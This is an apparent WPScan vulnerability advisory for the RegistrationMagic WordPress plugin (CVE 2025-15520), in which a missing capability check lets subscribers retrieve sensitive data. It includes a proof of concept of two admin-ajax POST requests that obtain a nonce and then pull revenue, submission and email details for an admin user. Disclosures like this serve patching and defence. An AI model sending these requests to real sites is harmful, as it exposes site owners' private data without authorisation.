RegistrationMagic <= 6.0.7.2 – Subscriber+ Sensitive Data Disclosure | CVE 2025-15520 | Plugin Vulnerabilities

Description

The plugin checks nonces but not capabilities, allowing for the disclosure of some sensitive data to subscribers and above.

Proof of Concept

Send a request as a subscriber to:

```
POST /wp-admin/admin-ajax.php HTTP/2

action=rm_sort_form_fields&rm_slug=rm_user_manage
```

Get the nonce from the response: `rm_sec_nonce` and send a second request:

```
POST /wp-admin/admin-ajax.php HTTP/2

action=rm_user_additional_details&rm_slug=rm_user_additional_details&rm_sec_nonce=ca71602e69&user_ids[]=1
```

The response will include values revenue, submissions, and sent emails.

Affects Plugins

custom-registration-form-builder-with-submission-manager

Fixed in 6.0.7.2

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

bRpsd

Submitter

bRpsd

Submitter website

https://www.exploit-db.com/?author=8147

Verified

Yes

WPVDB ID

996f1c93-4b28-4cec-9d7c-fb66d0addabc

Timeline

Publicly Published

2026-01-23 (about 21 days ago)

Added

2026-01-23 (about 20 days ago)

Last Updated

2026-01-23 (about 20 days ago)

Other

Published

Title

Published

2024-07-15

Title

Glossary < 2.2.27 - Unauthenticated Full Path Disclosure

Published

2021-12-13

Title

The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure

Published

2024-07-26

Title

Campaign Monitor for WordPress < 2.8.16 - Unauthenticated Full Path Disclosure

Published

2022-06-28

Title

SP Project & Document Manager < 4.58 - Sensitive File Disclosure

Published

2024-07-26

Title

Aramex Shipping WooCommerce <= 1.1.21 - Unauthenticated Full Path Disclosure